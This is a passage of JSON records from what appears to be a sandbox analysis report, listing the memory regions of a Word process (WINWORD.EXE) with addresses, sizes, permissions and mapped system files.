"00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_158", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5013503, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x0000000000400000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4194304, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6164479, "entry_point": 0, "filename": null, "id": "region_162", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6230015, "entry_point": 0, "filename": null, "id": "region_163", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 6295551, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x0000000000600000", "norm_filename": null, "region_type": "private_memory", "start_va": 6291456, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000000630000", "norm_filename": null, "region_type": "private_memory", "start_va": 6488064, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 7467007, "entry_point": 0, "filename": null, "id": "region_167", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7475199, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 7540735, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 7606271, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x0000000000740000", "norm_filename": null, "region_type": "private_memory", "start_va": 7602176, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 7671807, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 7737343, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 7802879, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000000770000", "norm_filename": null, "region_type": "private_memory", "start_va": 7798784, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 7868415, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x0000000000780000", "norm_filename": null, "region_type": "private_memory", "start_va": 7864320, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 7933951, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000000790000", "norm_filename": null, "region_type": "private_memory", "start_va": 7929856, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 7999487, "entry_point": 0, "filename": null, "id": "region_176", "name": "private_0x00000000007a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7995392, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 8065023, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x00000000007b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8060928, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_178", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 8196095, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x00000000007d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8192000, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 8519679, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x00000000007e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8257536, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 8519680, "type": "region", "version": 1 }, "end_va": 8523775, "entry_point": 0, "filename": null, "id": "region_181", "name": "pagefile_0x0000000000820000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8519680, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8601599, "entry_point": 0, "filename": null, "id": "region_182", "name": "pagefile_0x0000000000830000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8585216, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 8654847, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000000840000", "norm_filename": null, "region_type": "private_memory", "start_va": 8650752, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 8781823, "entry_point": 0, "filename": null, "id": "region_184", "name": "private_0x0000000000850000", "norm_filename": null, "region_type": "private_memory", "start_va": 8716288, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 9830399, "entry_point": 0, "filename": null, "id": "region_185", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 10878975, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000000960000", "norm_filename": null, "region_type": "private_memory", "start_va": 9830400, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 10878976, "type": "region", "version": 1 }, "end_va": 10883071, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x0000000000a60000", "norm_filename": null, "region_type": "private_memory", "start_va": 10878976, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 10952703, "entry_point": 0, "filename": null, "id": "region_188", "name": "pagefile_0x0000000000a70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10944512, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11014143, "entry_point": 0, "filename": null, "id": "region_189", "name": "pagefile_0x0000000000a80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11010048, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11075584, "type": "region", "version": 1 }, "end_va": 11079679, "entry_point": 0, "filename": null, "id": "region_190", "name": "pagefile_0x0000000000a90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11075584, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11141120, "type": "region", "version": 1 }, "end_va": 11145215, "entry_point": 11141120, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_191", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 11141120, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 11206656, "type": "region", "version": 1 }, "end_va": 11272191, "entry_point": 0, "filename": null, "id": "region_192", "name": "private_0x0000000000ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11206656, "timestamp": "00:00:12.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 11272192, "type": "region", "version": 1 }, "end_va": 12320767, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000000ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11272192, "timestamp": "00:00:12.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 155648, "start_va": 12320768, "type": "region", "version": 1 }, "end_va": 12476415, "entry_point": 12320768, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_194", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 12320768, "timestamp": "00:00:12.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 12517376, "type": "region", "version": 1 }, "end_va": 12521471, "entry_point": 0, "filename": null, "id": "region_195", "name": "pagefile_0x0000000000bf0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12517376, "timestamp": "00:00:12.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 12587007, "entry_point": 0, "filename": null, "id": "region_196", "name": "private_0x0000000000c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 12582912, "timestamp": "00:00:12.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 12648448, "type": "region", "version": 1 }, "end_va": 14577663, "entry_point": 12648448, "filename": "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "id": "region_197", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "region_type": "memory_mapped_file", "start_va": 12648448, "timestamp": "00:00:12.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 14614528, "type": "region", "version": 1 }, "end_va": 27197439, "entry_point": 0, "filename": null, "id": "region_198", "name": "pagefile_0x0000000000df0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14614528, "timestamp": "00:00:12.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 27197440, "type": "region", "version": 1 }, "end_va": 31338495, "entry_point": 0, "filename": null, "id": "region_199", "name": "pagefile_0x00000000019f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27197440, "timestamp": "00:00:12.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 34336767, "entry_point": 31391744, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_200", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31391744, "timestamp": "00:00:12.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 34865151, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:00:12.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 34934783, "entry_point": 34865152, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_202", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 34865152, "timestamp": "00:00:12.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35000319, "entry_point": 0, "filename": null, "id": "region_203", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35065855, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 36175871, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x0000000002180000", "norm_filename": null, "region_type": "private_memory", "start_va": 35127296, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 36179967, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x0000000002280000", "norm_filename": null, "region_type": "private_memory", "start_va": 36175872, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 36245503, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000002290000", "norm_filename": null, "region_type": "private_memory", "start_va": 36241408, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36311039, "entry_point": 0, "filename": null, "id": "region_208", "name": "private_0x00000000022a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36306944, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36376575, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x00000000022b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36372480, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36438016, "type": "region", "version": 1 }, "end_va": 36442111, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x00000000022c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36438016, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 36507647, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000022d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36503552, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36569088, "type": "region", "version": 1 }, "end_va": 36573183, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000022e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36569088, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36634624, "type": "region", "version": 1 }, "end_va": 36638719, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x00000000022f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36634624, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36700160, "type": "region", "version": 1 }, "end_va": 36704255, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000002300000", "norm_filename": null, "region_type": "private_memory", "start_va": 36700160, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 36769791, "entry_point": 0, "filename": null, "id": "region_215", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36831232, "type": "region", "version": 1 }, "end_va": 36835327, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000002320000", "norm_filename": null, "region_type": "private_memory", "start_va": 36831232, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 36900863, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000002330000", "norm_filename": null, "region_type": "private_memory", "start_va": 36896768, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 36962304, "type": "region", "version": 1 }, "end_va": 36966399, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000002340000", "norm_filename": null, "region_type": "private_memory", "start_va": 36962304, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 37031935, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 37097471, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x0000000002360000", "norm_filename": null, "region_type": "private_memory", "start_va": 37093376, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 37163007, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37351423, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000002380000", "norm_filename": null, "region_type": "private_memory", "start_va": 37224448, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 38404095, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x00000000023a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37355520, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 39452671, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39452672, "type": "region", "version": 1 }, "end_va": 39456767, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x00000000025a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39452672, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 39522303, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x00000000025b0000", "norm_filename": null, 